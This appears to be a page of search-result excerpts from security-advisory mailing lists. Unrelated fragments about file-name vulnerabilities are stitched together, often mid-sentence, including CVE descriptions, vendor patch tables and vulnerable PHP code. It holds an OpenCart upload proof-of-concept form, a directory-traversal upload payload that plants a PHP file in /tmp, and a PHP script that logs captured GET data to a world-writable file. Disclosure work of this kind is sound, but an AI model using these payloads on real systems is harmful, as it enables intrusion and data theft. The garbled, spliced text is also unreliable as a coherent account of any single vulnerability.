Next Page >>
filenames
if (! @ is_uploaded_file( $file['tmp_name'] ) )
return $upload_error_handler( $file, __( 'Specified file failed upload test.' ));
// A correct MIME type will pass this test. Override $mimes or use the upload_mimes filter.
if ( $test_type ) {
$wp_filetype = wp_check_filetype( $file['name'], $mimes );
extract( $wp_filetype );
if ( ( !$type || !$ext ) && !current_user_can( 'unfiltered_upload' ) )
return $upload_error_handler( $file,
Test: for testing let's use html form below:
-----------------[ PoC code start ]-----------------------------------
<html><body><center>
<form action="http://localhost/opencart1521/index.php?route=product/product/upload"
method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="Upload test">
</form>
</center></body></html>
-----------------[ PoC code end ]-----------------------------------
defined by the creator of the PDF file without asking the user for
confirmation. A proof of concept PDF file is included [4].
The second one is a stack-based buffer overflow (CVE-2009-0837). If an
'Open/Execute a file' action is defined in the PDF file with an overly
long filename argument, when the trigger condition is satisfied it will
cause a stack-based buffer overflow, because the application tries to
copy the filename argument to a fixed-size buffer in the stack without
properly checking that the buffer is large enough to hold the filename
string. Proof of concept PDF file also included [5].
Timbuktu Pro [1] is a desktop-to-desktop remote control software for the
Windows and Macintosh operating systems. The following vulnerabilities
have been identified in Timbuktu Pro:
1) File transfer directory traversal (CVE-2008-1117): The '\' and '/'
are not properly sanitized when checking the destination filename. The
problem resides in the Notes feature implemented by tb2ftp.dll loaded by
the tb2pro.exe. This is the main issue.
2) Log input manipulation (CVE-2008-1118): Several fields of the packet
containing peer information (computer name, user name and IP address)
Content-Type: multipart/form-data; boundary=----------YN7xkbcuNgNx21psG30p21
- ------------YN7xkbcuNgNx21psG30p21
Content-Disposition: form-data; name="Attachment";
filename="../../../../../../../tmp/popote.php"
Content-Type: application/octet-stream
2. Overview
``Vim is an almost compatible version of the UNIX editor Vi. Many new features
have been added: multi-level undo, syntax highlighting, command line history,
on-line help, spell checking, filename completion, block operations, etc.''
-- VIM 7.1 README.txt
Parts of Vim are written in the Vim script language. A feature of this
language widely used in the Vim code is the ``execute'' command, an equivalent
of ``eval'' in some other languages. Throughout Vim, arguments passed to
When this feature is requested and an attachment is specified, the
"saveForwardAttachments" validation routine is called.
This routine involves some security checks to handle uploaded files, it
does blacklist extension checking and if a bad extension is detected the
txt extension is appended to the file-name.
The following is the specific section:
--8<--8<--8<--8<--8<--8<--8<-Vtiger CRM 5.0.4 Multiple Vulnerabilities
Unicenter Desktop Management Bundle r11.1 (GA, a, C1),
Unicenter Asset Management r11.1 (GA, a, C1),
Unicenter Software Delivery r11.1 (GA, a, C1),
Unicenter Remote Control r11.1 (GA, a, C1),
CA Desktop and Server Management r11.1 (GA, a, C1)
File Name:
gui_cm_ctrls.ocx
File Version:
11.1.8124.2517
Product:
4. If the file date is earlier than indicated in the below table,
the installation is vulnerable.
CA ARCserve Backup for Laptops and Desktops
File Name File Size (bytes) File Date
rxRPC.dll 131,072 June 11, 2008
CA ARCserve Backup for Laptops and Desktops 11.1, 11.1 SP1, 11.1
SP2
File Name File Size (bytes) File Date
administrator). When the name of the file is specified, a validation
routine is called:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
function safeAttachmentName($filename) {
global $sugar_config;
$badExtension = false;
//get position of last "." in file name
$file_ext_beg = strrpos($filename, ".");
$file_ext = "";
interesting code:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
streams/plain_wrapper.c-893: if ((realpath =
expand_filepath(filename, NULL TSRMLS_CC)) == NULL) {
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
The attention was then directed to the expand_filepath() function,
defined in main/fopen_wrappers.c, and finally to expand_filepath_ex(),
2. Right click on each of the files and select Properties.
3. Select the General tab.
4. If either file timestamp is earlier than indicated in the below
table, the installation is vulnerable.
File Name
Timestamp
Size
Size on disk
webengine.exe
(User registrations are enabled by default as well, making this attack possible in most scenarios.)
-:: Solution ::-
download.ctrl.php: (Line 55-62)
55 function isValidFile($fileName) {
56 $fileName = urldecode($fileName);
// This tries to prevent directory traversal
57 $fileName = str_replace('../', '', $fileName);
58 if (preg_match('/\.xml$|\.html$|\.txt$/i', $fileName)) {
59 return $fileName;
This is really a non-fix, as some legitimate files might have the double-period as part of its name and might still be circumvented with exactly the same string you provided here minus one slash.
The real solution would be to get the absolute path of the file provided and fail if that path isn't beneath the current directory/directory this should operate under. Something like:
$fnCheck = realpath($fileName);
If ($fnCheck === FALSE || strncasecmp(getcwd(), $fnCheck, strlen(getcwd())) return false;
(replacing getcwd() with whatever dir this should work with if not the current one)
-Zach
CA Desktop Management Suite for Windows r11.1 (GA, a, C1),
Unicenter Desktop Management Bundle r11.1 (GA, a, C1),
Unicenter Asset Management r11.1 (GA, a, C1),
Unicenter Software Delivery r11.1 (GA, a, C1),
Unicenter Remote Control r11.1 (GA, a, C1)
File Name: ListCtrl.ocx
File Version: 11.1.8124.0
Product:
CA Desktop Management Suite for Windows r11.2,
Unicenter Desktop Management Bundle r11.2,
| CubilFelino Security Research Lab |
| proudly presents... |
+------------------------------------------------------------------------+
=======================================================
Security Advisory: WinRAR v3.80 - ZIP Filename Spoofing
=======================================================
Security Researcher Info:
=========================
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers
1. *Advisory Information*
2. POST parameters or cookies can be used as attack vector
3. Vulnerable are all Vivvo CMS versions >= 4.1.0
-----------------------------[source code start]-------------------------------
if (isset($_REQUEST["file"])) {
$filename = str_replace('..', '', $_REQUEST["file"]);
$filename = str_replace('logs/', '', $filename);
$file = VIVVO_FS_ROOT . 'files/' . $filename;
if (file_exists($file) && !is_link($file) && !is_dir($file)){
$file_split = explode('.', $file);
$ext = end ($file_split);
Original URL:
http://securityreason.com/achievement_securityalert/98
--- 0.Description ---
fnmatch -- match filename or pathname using shell glob rules
SYNOPSIS
#include <fnmatch.h>
int
First we need a little php file in order to get and save our needed information + A txt file to save them there and chmod must be 777 in order to work
[code]
<?php
if ( $_GET['text'] ) {
$text = $_GET['text'];
$filename = "Aria-Security.txt";
$fp = fopen( $filename, "w" ) or die("Couldn't open $filename");
fwrite( $fp, "$text" );
fclose( $fp );
}
//--------------
3. Select the General tab.
4. If the file timestamp is earlier than indicated in the table
below, the installation is vulnerable.
Product version: CA ARCserve Backup r11.1 Windows
File Name: asdbapi.dll
File Size: 856064 bytes
Timestamp: 09/05/2008 10:35:19
Product version: CA ARCserve Backup r11.5 Windows*
File Name: asdbapi.dll
The problem can be exploited when using an untrusted/compromised rmt
server. The impact is fairly low since rmt is rarely used today and
the rmt server is in most cases considered trustworthy.
However, this vulnerability can also be triggered when trying to
extract a tar file with a colon in the filename. In this case, tar
interprets the part before the colon as a hostname (or user@hostname)
and opens a rsh connection to this host. This may also be exploited if
the user uses the aunpack script from atool [1] to extract a tar
file. Many users of GNU Tar or atool don't know that rmt exists and
that tar treats filenames containing a colon differently. So a user
I actually DID try to access the .sdb in Ubuntu but that was before I identified the file format of the db as myDB as noted. I do not know of a 'nix based tool for access to the db. If you just want to verify, you can open the .sdb with a text/hex editor and parse out a filename for yourself - it's pretty straight forward. If you want to script the download of all files on a vulnerable server (for testing, of course) then you'll probably need to go ahead and set up a VM.
t
From: Rohit Patnaik [mailto:quanticle@gmail.com]
Sent: Tuesday, December 15, 2009 6:29 PM
To: Thor (Hammer of God)
Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] File Access Vulnerability in Easy File Sharing Web Server
Patches
Red Hat Enterprise Linux - HP SNMP Agents v8.7.0
Product
File Name
HP SNMP Agents for Red Hat Enterprise Linux 5 (AMD64/EM64T)
hp-snmp-agents-8.7.0.23-17.rhel5.x86_64.rpm
HP SNMP Agents for Red Hat Enterprise Linux 6 (AMD64/EM64T)
function upload_imm () {
global $mkportals, $DB, $mklib, $Skin, $_FILES;
..
$file = $_FILES['FILE_UPLOAD']['tmp_name'];
$file_name = $_FILES['FILE_UPLOAD']['name'];
//$file_type = $_FILES['FILE_UPLOAD']['type'];
$peso = $_FILES['FILE_UPLOAD']['size'];
if (!$file) {
$message = "{$mklib->lang['b_compfile']}";
compression, browser detection, connection tracking, MIME handling,
and more."
During an audit of a PHP web application which is based on the Horde
Application Framework it was discovered that form elements of the type
Horde_Form_Type_image trust a user supplied temporary filename which
allows to create or overwrite arbitrary files with the permissions
of the webserver.
By overwriting writable files within the document root like the Horde
configuration file, or by creating new files within writable parts of
fclose($fp);
echo "<center><div id=logostrip>Successfully saved!</div></center>";
}
if ($doupfile) {
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "ЙПґ«іЙ№¦!" : "ЙПґ«К§°Ь!";
}
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
if (!empty($newdirectory)) {
return CL_SUCCESS;
}
This function, cli_gentempfd, uses a custom function to generate a
(more or less)
unique file name which is then opened, and the file descriptor is returned via
an output parameter.
The problem with this code is that a race condition exists: if the attacker is
able to guess the generated file name, he/she is able to create such a named
file between the call of cli_gentemp() and open(), making it possible to
capabilities, from one of several available documents. There are
two implementations of this.
* A type map (a file with the handler type-map) which explicitly
lists the files containing the variants.
* A MultiViews search (enabled by the MultiViews Option, where the
server does an implicit filename pattern match, and choose from
amongst the results.
[ Summary ]
- Severity: 5/5
=============================================
I. VULNERABILITY
-------------------------
Cygwin buffer overflow in the filename length check
II. BACKGROUND
-------------------------
Cygwin is a Linux-like environment for Windows wich consists in a dll
binary (cygwin1.dll) wichs emulates linux api, and a set of tools
Next Page>>
|
